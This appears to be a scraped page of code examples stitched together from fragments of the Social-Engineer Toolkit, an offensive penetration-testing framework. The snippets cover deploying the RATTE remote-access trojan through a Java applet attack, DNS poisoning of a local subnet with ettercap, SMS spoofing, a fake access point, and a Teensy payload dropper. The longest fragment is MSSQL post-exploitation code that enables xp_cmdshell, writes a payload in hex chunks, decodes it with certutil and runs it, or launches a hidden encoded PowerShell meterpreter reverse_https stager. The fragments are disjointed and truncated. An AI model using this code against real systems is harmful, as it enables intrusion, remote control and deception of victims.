		ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on")))
		while ratteport == javaport or ratteport == 0 or ratteport > 65535:
			core.PrintWarning("Port must not be equal to javaport!")
			ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on")))
	except ValueError:
		ratteport = 8080
	
	persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
	if persistent == "no" or persistent == "" or persistent == "n":
		persistent="NO"
	else:
		persistent="YES"

	customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
	#if persistent == "no" or persistent == "" or persistent == "n":
	#	persistent="NO"
	#else:
	#	persistent="YES"
	
	#######################################
	# prepare RATTE
	#######################################

	prepare_ratte(ipaddr,ratteport,persistent,customexe)
	
	######################################
	# Java Applet Attack to deploy RATTE
	#######################################

	core.PrintInfo("Starting java applet attack...")
	java_applet_attack_tw(website,javaport, "reports/",ipaddr)

	fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
        for line in fileopen:
                ratte_random = line.rstrip()
        subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()

	#######################
	# start ratteserver 
	#######################

	core.PrintInfo("Starting ratteserver...")
	ratte_listener_start(ratteport)
	
	######################
	# stop webserver 
	######################
	stop_web_server_tw()
コード例 #33
0
you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task.

It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
""")

# if we hit here we are good since msfvenom is installed
print("""
        .-. .-. . . .-. .-. .-. .-. .-.   .  . .-. .-. .-.
        |.. |-| |\| |.. `-.  |  |-  |(    |\/| | | |  )|-
        `-' ` ' ' ` `-' `-'  '  `-' ' '   '  ` `-' `-' `-'
                                                   enabled.\n""")

# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
    while True:
        core.print_warning("Filename not found, try again")
        path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
        if os.path.isfile(path):
            break

core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")

with open(path, "rb") as fileopen:
    data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
    filewrite.write(data)
コード例 #34
0
    etterpath=re.search("ETTERCAP_PATH=", line)
    if etterpath:
        line=line.rstrip()
        path=line.replace("ETTERCAP_PATH=", "")

	if not os.path.isfile(path):
		path = ("/usr/local/share/ettercap")

# if we are using ettercap then get everything ready
if ettercapchoice== 'y':

    # grab ipaddr
    if check_options("IPADDR=") != 0:
        ipaddr = check_options("IPADDR=")
    else:
        ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
        update_options("IPADDR=" + ipaddr)

    if ettercapchoice == 'y':
        try:
            print """
  This attack will poison all victims on your local subnet, and redirect them
  when they hit a specific website. The next prompt will ask you which site you
  will want to trigger the DNS redirect on. A simple example of this is if you
  wanted to trigger everyone on your subnet to connect to you when they go to
  browse to www.google.com, the victim would then be redirected to your malicious
  site. You can alternatively poison everyone and everysite by using the wildcard 
  '*' flag.

  IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
コード例 #35
0
      "the account. SET will then handle the rest.\n")

print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
      "spoofmytextmessage.com\n")

core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
                 "services from spoofmytextmessage.com and you are fully aware of your countries "
                 "legal stance on SMS spoofing prior to performing any of these. By accepting yes "
                 "you fully acknowledge these terms and will not use them for unlawful purposes.")

message = input("\nDo you accept these terms (yes or no): ")

if message == "yes":
    core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
    email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
    pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
    core.print_status("The next section requires a country code, this is the code you would use to dial "
                      "to the specific country, for example if I was sending a message to 555-555-5555 to "
                      "the United States (or from) you would enter +1 below.")

    tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
                                            "(for example U.S would be '+1')[+1]"))
    if tocountry == "":
        tocountry = "+1"

    fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
                                              "(for example U.S. would be '+1')[+1]"))
    if fromcountry == "":
        fromcountry = "+1"
コード例 #36
0
def launch():
    while 1:
        print("""
1.  Pre-Defined Template
2.  One-Time Use SMS

99. Cancel and return to SMS Spoofing Menu
""")
        template_choice = raw_input(
            core.setprompt(
                ["7"], "Use a predefined template or craft a one time SMS?"))
        # if predefined template go here
        if template_choice == '1':
            # set path for
            path = 'src/templates/sms/'
            filewrite = file(setdir + "/sms.templates", "w")
            counter = 0
            # Pull all files in the templates directory
            for infile in glob.glob(os.path.join(path, '*.template')):
                infile = infile.split("/")
                # grab just the filename
                infile = infile[3]
                counter = counter + 1
                # put it in a format we can use later in a file
                filewrite.write(infile + " " + str(counter) + "\n")
            # close the file
            filewrite.close()
            # read in formatted filenames
            fileread = file(setdir + "/sms.templates", "r").readlines()
            print "Below is a list of available templates:\n"
            for line in fileread:
                line = line.rstrip()
                line = line.split(" ")
                filename = line[0]
                # read in file
                fileread2 = file("src/templates/sms/%s" % (filename),
                                 "r").readlines()
                for line2 in fileread2:
                    match = re.search("SUBJECT=", line2)
                    if match:
                        line2 = line2.rstrip()
                        line2 = line2.split("=")
                        line2 = line2[1]
                        # strip double quotes
                        line2 = line2.replace('"', "")
                        # display results back
                        print line[1] + ": " + line2

            # allow user to select template
            choice = raw_input(core.setprompt(["7"], "Select template"))
            for line in fileread:
                # split based off of space
                line = line.split(" ")
                # search for the choice
                match = re.search(str(choice), line[1])
                if match:
                    extract = line[0]
                    fileopen = file("src/templates/sms/" + str(extract),
                                    "r").readlines()
                    for line2 in fileopen:
                        match2 = re.search("ORIGIN=", line2)
                        if match2:
                            origin = line2.replace('"', "")
                            origin = origin.split("=")
                            origin = origin[1]
                        match3 = re.search("SUBJECT=", line2)
                        if match3:
                            subject = line2.replace('"', "")
                            subject = subject.split("=")
                            subject = subject[1]
                        match4 = re.search("BODY=", line2)
                        if match4:
                            body = line2.replace('"', "")
                            body = body.replace(r'\n', " \n ")
                            body = body.split("=")
                            body = body[1]

            break
        if template_choice == '2':
            try:
                origin = raw_input(core.setprompt(["7"],
                                                  "Source number phone"))
                body = raw_input(
                    core.setprompt([
                        "7"
                    ], "Body of the message, hit return for a new line. Control+c when finished"
                                   ))
                while body != 'sdfsdfihdsfsodhdsofh':
                    try:
                        body += ("\n")
                        body += raw_input("Next line of the body: ")
                    except KeyboardInterrupt:
                        break
            except KeyboardInterrupt:
                pass
            break

        if template_choice == '99':
            break

    if template_choice != '3':
        while 1:
            print("""
Service Selection

There are diferent services you can use for the SMS spoofing, select
your own.

1.  SohoOS (buggy)
2.  Lleida.net (pay)
3.  SMSGANG (pay)
4.  Android Emulator (need to install Android Emulator)

99. Cancel and return to SMS Spoofing Menu
""")
            service_option = raw_input(core.setprompt(["7"], ""))
            # exit
            if service_option == '1':
                break
            if service_option == '2':
                break
            if service_option == '3':
                break
            if service_option == '4':
                break
            if service_option == '99':
                break

    if template_choice != '3' and service_option != '99':
        #sohoOS service
        if service_option == '1':
            for to in phones:
                send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        #Lleida.net service
        if service_option == '2':
            user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
            password = raw_input(
                core.setprompt(["7"], "Your Lleida.net password"))
            email = raw_input(
                core.setprompt(["7"], "Email for the receipt (optional)"))
            for to in phones:
                send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(),
                                   user, password, email)
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        #SMSGANG service
        if service_option == '3':
            pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
            for to in phones:
                send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(),
                                 pincode)
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        #Andriod Emulator service
        if service_option == '4':
            for to in phones:
                send_android_emu_sms(origin.rstrip(), body.rstrip())
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()
コード例 #37
0
ファイル: solo.py プロジェクト: obiwan111/SET
#!/usr/bin/python
import subprocess
import os
import re
import sys
from src.core import setcore

# definepath
definepath = os.getcwd()
sys.path.append(definepath)

meta_path = setcore.meta_path()

# launch msf listener
setcore.PrintInfo("The payload can be found in the SET home directory.")
choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]"))
if choice == "yes" or choice == "y":

    # if we didn't select the SET interactive shell as our payload
    if not os.path.isfile("src/program_junk/set.payload"):
        setcore.PrintInfo(
            "Please wait while the Metasploit listener is loaded...")
        subprocess.Popen(
            "ruby %s/msfconsole -L -n -r src/program_junk/meta_config" %
            (meta_path),
            shell=True).wait()

    # if we did select the set payload as our option
    if os.path.isfile("src/program_junk/set.payload"):
        fileopen = file("src/program_junk/port.options", "r")
        set_payload = file("src/program_junk/set.payload", "r")
コード例 #38
0
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
""")

# if we dont detect metasploit
if not os.path.isfile(msf_path):
    sys.exit("\n[!] Your no gangster... Metasploit not detected, check set_config.\n")

# if we hit here we are good since msfvenom is installed
###################################################
#        USER INPUT: SHOW PAYLOAD MENU 2          #
###################################################

show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2)
payload = (input(core.setprompt(["14"], "")))

if payload == "exit":
    core.exit_set()

# if its default then select meterpreter
if payload == "":
    payload = "2"

# assign the right payload
payload = ms_payload(payload)

# if we're downloading and executing a file
url = ""
port = ""
if payload == "windows/download_exec":
コード例 #39
0
def deploy_hex2binary(ipaddr, port, username, password):
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    try:
        conn.execute_query(
            "exec master.dbo.sp_configure 'show advanced options',1;"
            "GO;"
            "RECONFIGURE;"
            "GO;"
            "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
            "GO;"
            "RECONFIGURE;"
            "GO")
    except:
        pass
    # just throw a simple command via powershell to get the output
    try:
        print(
            """Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
        )

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status(
                "Powershell injection was selected to deploy to the remote system (awesome)."
            )
            option_ps = input(
                "Do you want to use powershell injection? [yes/no]:")
            if option_ps.lower(
            ) == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        print(err)
    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            attempts = 0
            while attempts <= 2:
                payload_filename = input(
                    "Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
                )
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                core.print_error(
                    "Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
                )
                choice1 = "1"

        if choice1 == "1":
            web_path = None
            prep_powershell_payload()

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
                # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir),
                                         shell=True).wait()
                        subprocess.Popen(
                            "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                            (core.setdir, core.setdir),
                            shell=True).wait()
                        subprocess.Popen(
                            "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
                            % (core.setdir, core.setdir),
                            shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # we write out binary out to a file

        with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
            filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                        core.print_status(
                            "Starting the Metasploit listener...")
                        msf_path = core.meta_path()
                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
                            os.path.join(core.meta_path() + "msfconsole"),
                            os.path.join(core.setdir + "meta_config")))

        # random executable name
        random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #
    if option == "1":
        core.print_status(
            "Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(
            core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status(
            "Prepping the payload for delivery and injecting alphanumeric shellcode..."
        )

        with open(os.path.join(core.setdir + "/payload_options.shellcode"),
                  "w") as filewrite:
            # format needed for shellcode generation
            filewrite.write(
                "windows/meterpreter/reverse_https {0},".format(port))

        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        with open(os.path.join(core.setdir + "x86.powershell")) as x86:
            x86 = x86.read()

        x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(
            x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(
                              os.path.join(core.setdir +
                                           "reports/powershell")))
        with open(
                os.path.join(
                    core.setdir +
                    "/reports/powershell/x86_powershell_injection.txt"),
                "w") as filewrite:
            filewrite.write(x86)

        # if our payload is x86 based - need to prep msfconsole rc
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            with open(
                    os.path.join(core.setdir +
                                 "reports/powershell/powershell.rc"),
                    "w") as filewrite:
                filewrite.write(
                    "use multi/handler\n"
                    "set payload windows/meterpreter/reverse_https\n"
                    "set lport {0}\n"
                    "set LHOST 0.0.0.0\n"
                    "exploit -j".format(port))
        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":

            try:
                core.module_reload(pexpect)
            except:
                import pexpect

            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(
                os.path.join(msf_path + "msfconsole"),
                os.path.join(core.setdir +
                             "reports/powershell/powershell.rc")))
            core.print_status(
                "Waiting for the listener to start first before we continue forward..."
            )
            core.print_status(
                "Be patient, Metasploit takes a little bit to start...")
            child2.expect("Starting the payload handler", timeout=30000)
            core.print_status(
                "Metasploit started... Waiting a couple more seconds for listener to activate.."
            )
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":

        # here we start the conversion and execute the payload
        core.print_status(
            "Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
            .format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":
                break

            core.print_status(
                "Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
                .format(bold=core.bcolors.BOLD,
                        data=data,
                        endc=core.bcolors.ENDC))

            conn.execute_query(
                "exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
                    data=data, exe=random_exe))
        core.print_status(
            "Delivery complete. Converting hex back to binary format.")
        core.print_status(
            "Dropping end header for binary format conversion...")
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
            .format(random_exe))
        core.print_status(
            "Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
        )
        conn.execute_query(
            "exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
            format(random_exe))
        core.print_status(
            "Executing the payload - magic has happened and now its time for that moment.. "
            "You know. When you celebrate. Salute to you ninja - you deserve it."
        )
        conn.execute_query(
            "exec master..xp_cmdshell '{0}.exe'".format(random_exe))
        # if we are using SET payload
        if choice1 == "1":
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                core.print_status(
                    "Spawning separate child process for listener...")
                try:
                    shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
                                    definepath)
                except:
                    pass

                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py",
                                 shell=True)
                # grab the port options

                # if core.check_options("PORT=") != 0:
                #     port = core.heck_options("PORT=")
                #
                # # if for some reason the port didnt get created we default to 443
                # else:
                #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = (
            "exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command, ))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir +
                                   "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
            random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command, ))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
コード例 #40
0
from src.core.setcore import debug_msg, mod_name

me = mod_name()
while 1:
    print """
   SMS Attack Menu

   There are diferent attacks you can launch in the context of SMS spoofing, 
   select your own.

    1.  SMS Attack Single Phone Number
    2.  SMS Attack Mass SMS

    99. Return to SMS Spoofing Menu\n"""

    attack_option=raw_input(core.setprompt("0",""))

    if attack_option == 'exit':
        core.exit_set()
    # exit 
    if attack_option == '1':
        print("\nSingle SMS Attack")
        to = raw_input(core.setprompt(["7"], "Send sms to"))
        phones = list()
        phones.append(to)
        sys.path.append("src/sms/client/")
        try:
            # ugly but "compliant" with SET architecture 
            debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
            reload(sms_launch)
            sms_launch.phones = phones
コード例 #41
0
#!/usr/bin/env python
import random
from src.core import setcore as core

try:
    print ("\n         [****]  Custom Template Generator [****]\n")
    author=raw_input(core.setprompt(["7"], "Name of the author"))
    filename=randomgen=random.randrange(1,99999999999999999999)
    filename=str(filename)+(".template")
    origin=raw_input(core.setprompt(["7"], "Source phone # of the template"))
    subject=raw_input(core.setprompt(["7"], "Subject of the template"))
    body=raw_input(core.setprompt(["7"], "Body of the message"))
    filewrite=file("src/templates/sms/%s" % (filename), "w")
    filewrite.write("# Author: "+author+"\n#\n#\n#\n")
    filewrite.write('ORIGIN='+'"'+origin+'"\n\n')
    filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
    filewrite.write('BODY='+'"'+body+'"\n')
    print "\n"
    filewrite.close()
except Exception, e:
    core.print_error("An error occured:")
    core.print_error("ERROR:" + str(e))
コード例 #42
0
for name in glob.glob("modules/*.py"):

    counter = counter + 1
    fileopen = file(name, "r")

    for line in fileopen:
        line = line.rstrip()
        match = re.search("MAIN=", line)
        if match:
            line = line.replace('MAIN="', "")
            line = line.replace('"', "")
            line = "  " + str(counter) + ". " + line
            print line

print "\n  99. Return to the previous menu\n"
choice = raw_input(setcore.setprompt(["9"], ""))

if choice == 'exit':
    setcore.ExitSet()

if choice == '99':
    menu_return = "true"

# throw error if not integer
try:
    choice = int(choice)
except:
    setcore.PrintWarning("An integer was not used try again")
    choice = raw_input(setcore.setprompt(["9"], ""))

# start a new counter to match choice
コード例 #43
0
ファイル: wifiattack.py プロジェクト: warecrer/SETOOLKIT
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
    range 192.168.10.100 192.168.10.254;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.10.1;
    option broadcast-address 192.168.10.255;
    default-lease-time 600;
    max-lease-time 7200;
}
""")

dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text,
                                         text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))

if fakeap_dhcp_menu_choice != "":
    fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
    # convert it to a string
    fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
else:
    fakeap_dhcp_menu_choice = "1"

if fakeap_dhcp_menu_choice == "1":
    # writes the dhcp server out
    core.print_status("Writing the dhcp configuration file to ~/.set")
    with open(os.path.join(core.userconfigpath, "dhcp.conf"),
              "w") as filewrite:
        filewrite.write(dhcp_config1)
    dhcptun = 1
コード例 #44
0
def main():
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #         ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #         while ratteport==0 or ratteport > 65535:
    #                 print_warning('Port must not be equal to javaport!')
    #                 ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #         ratteport=8080

    try:
        ratteport = int(
            input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #         persistent='NO'
    # else:
    #         persistent='YES'

    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    valid_response = False

    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Payload has been exported to %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
コード例 #45
0
ファイル: fasttrack.py プロジェクト: BrzTit/SET
import subprocess
import _mssql
#
#
# Fast-Track Main options and interface menus
#
#
setcore.check_mssql()
try:
	while 1:
		###################################################
		#        USER INPUT: SHOW WEB ATTACK MENU         #
		###################################################

		setcore.CreateMenu(text.fasttrack_text, text.fasttrack_menu)
		attack_vector = raw_input(setcore.setprompt(["19"], ""))

		if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
			break

		##################################
		##################################
		# mssql_scanner
		##################################
		##################################
		if attack_vector == "1":
			# start the menu
			setcore.CreateMenu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
			# take input here
			attack_vector_sql = raw_input(setcore.setprompt(["19","21"], ""))
コード例 #46
0
            newpath = input("Enter the path to the .jar file: ")
            if os.path.isfile(newpath):
                break

    # import into SET
    core.print_status("Importing the applet into SET for weaponization...")
    shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar.orig"))
    shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar"))
    core.print_status("The applet has been successfully imported into SET.")

# if we want to either generate a certificate or use our own certificate
# this is it
if firstprompt == "2":
    cert_path = ""
    # prompt for a different certificate
    prompt = input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
    # if we selected yes if we generated a code signing certificate
    if prompt == "yes" or prompt == "y":
        # prompt the user to import the code signing certificate
        cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
        if not os.path.isfile(cert_path):
            # loop forever
            while True:
                core.print_error("ERROR:Filename not found. Try again.")
                # re-prompt if we didn't file the filename
                cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))
                # if we find the filename then break out of loop
                if os.path.isfile(cert_path):
                    break

        # here is where we import the certificate
コード例 #47
0
#!/usr/bin/env python
import random
from src.core import setcore as core

try:
    print("\n         [****]  Custom Template Generator [****]\n")
    print(
        "\n   Always looking for new templates! In the set/src/templates directory send an email\nto [email protected] if you got a good template!"
    )
    author = raw_input(core.setprompt("0", "Name of the author"))
    filename = randomgen = random.randrange(1, 99999999999999999999)
    filename = str(filename) + (".template")
    subject = raw_input(core.setprompt("0", "Email Subject"))
    try:
        body = raw_input(
            core.setprompt(
                "0",
                "Message Body, hit return for a new line. Control+c when you are finished"
            ))
        while body != 'sdfsdfihdsfsodhdsofh':
            try:
                body += (r"\n")
                body += raw_input("Next line of the body: ")
            except KeyboardInterrupt:
                break
    except KeyboardInterrupt:
        pass
    filewrite = file("src/templates/%s" % (filename), "w")
    filewrite.write("# Author: " + author + "\n#\n#\n#\n")
    filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
    filewrite.write('BODY=' + '"' + body + '"\n')
コード例 #48
0
ファイル: verified_sign.py プロジェクト: obiwan111/SET
 business, buy a code signing certificate, and publish an applet to be whatever you want.
"""

core.PrintError("*** WARNING ***")
core.PrintError(
    "IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk"
)
core.PrintError("*** WARNING ***")

# use flag is in case someone already has a code signing certificate, in that case it bypasses the "no" answer
use_flag = 0

# prompt for a different certificate
prompt = raw_input(
    core.setprompt(
        "0",
        "Have you already generated a code signing-certificate? [yes|no]"))
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
    # prompt the user to import the code signing certificate
    cert_path = raw_input(
        core.setprompt("0", "Path to the code signing certificate file"))
    if not os.path.isfile(cert_path):
        # loop forever
        while 1 == 1:
            core.PrintError("ERROR:Filename not found. Try again.")
            # re-prompt if we didn't file the filename
            cert_path = raw_input(
                core.setprompt("0", "Path to the .cer certificate file"))
            # if we find the filename then break out of loop
            if os.path.isfile(cert_path): break
コード例 #49
0
def main():

    #pause=raw_input("This module has finished completing. Press <enter> to continue")

    website = raw_input(
        core.setprompt(["9", "2"],
                       "Enter website to clone (ex. https://gmail.com)"))
    ipaddr = raw_input(
